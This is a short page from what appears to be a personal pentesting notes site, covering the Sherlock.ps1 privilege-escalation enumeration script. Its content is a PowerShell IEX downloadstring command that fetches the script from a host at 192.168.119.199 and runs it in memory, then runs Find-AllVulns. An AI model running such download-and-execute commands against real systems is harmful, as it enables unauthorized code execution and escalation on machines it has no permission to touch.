Skip to content

MichalSzalkowski.com/security

Sherlock.ps1

Initializing search

MichalSzalkowski.com/security

Home
Bruteforce
CVE
File transfer
Kali
Active directory
Active directory
Binary
Binary
Cheat sheet
Cheat sheet
Client side attacks
Client side attacks
- Abusing Windows Library Files
- MS Word Macro
Cloud
Cloud
- Azure
Enumeration
Enumeration
K8s
K8s
Laboratory
Laboratory
Links
Links
- AD laboratory
- Links
Linux
Linux
Metasploit
Metasploit
- msfvenom
Mitm
Mitm
Notes
Notes
- API Security Testing
- WEB Penetration testing
Payload
Payload
Pentesting mobile
Pentesting mobile
- Android
  Android
  - Laboratory - Android
  - Reverse engineering - Android
- Iphone
  Iphone
  - Reverse Engineering - iPhone
Pentesting ports
Pentesting ports
Pentesting web
Pentesting web
- Cms
  Cms
- Other
  Other
  - 0xdf.scf
  - GIF89a
  - CGI
  - ColdFusion 8
  - cors
  - Couch db
  - File inclusion
  - File Upload bypass (.htaccess)
  - file-upload
  - Grafana
  - iframe
  - index of
  - JWT
  - lxd/lxc group
  - Magento
  - Microsoft-IIS/7.5
  - nagios
  - NoSql
  - PHP LFI with RCE
  - phpinfo
  - postfix-shellshock
  - postMessage
  - Python RCE
  - WebAssembly
- Services
  Services
- Vulnerabilities
  Vulnerabilities
Pivoting tunneling port forwarding
Pivoting tunneling port forwarding
Script
Script
Sso
Sso
Stego
Stego
Tool
Tool
- American fuzzy lop
- Amass
- AutoRecon
- Censys
- cewl
- Chkrootkit
- Curl
- curlx.sh
- Microsoft Access Database
- Digbit
- Dirb
- DnsEnum
- ffuf
- Firefox
- pure-ftpd
- ftp
- ghauri
- GHDB - Google hacking database
- GIT Dumper
- Gobuster
- Hashcat
- Host tracker
- hping3
- hydra
- IP
- John
- MongoDB
- neo4j
- Netcat
- nikto
- nishang
- Nmap
- PEASS-ng
- PHP
- ping
- PRET
- Protocol Buffers
- pwntools
- Python
- RKhunter
- scp
- Sherlock.ps1
- Socat
- Sqlmap
- SSL
- Tcpdump
- Tweep
- unicornscan
- wget.vbs
- wgetx.sh
- Wordpress check
- xfreerdp
- xml
Windows
Windows
- CMD & PowerShell
- Information gathering
- Local Persistence
- Privilege Escalation
- Tools
  Tools
  - PowerUp.ps1
  - PowerUpSQL
  - PowerView.ps1
  - RoguePotato
  - Rubeus.exe
  - BloodHound
  - crackmapexec
  - winrm
  - hashgrab
  - Hta reverse sell
  - impacket
  - Inveigh
  - kerbrute
  - mimikatz
  - netcat.exe
  - Powercat
  - PowerShell ActiveDirectory Module
  - Responder
  - RPCclient
  - RunasCs
  - SharpView
  - SMBMap
  - Snaffler
  - winPEAS.exe
  - Windapsearch
  - winexe

Sherlock.ps1

load

IEX(New-Object Net.WebClient).downloadstring('http://192.168.119.199:8000/Sherlock.ps1')

run

Find-AllVulns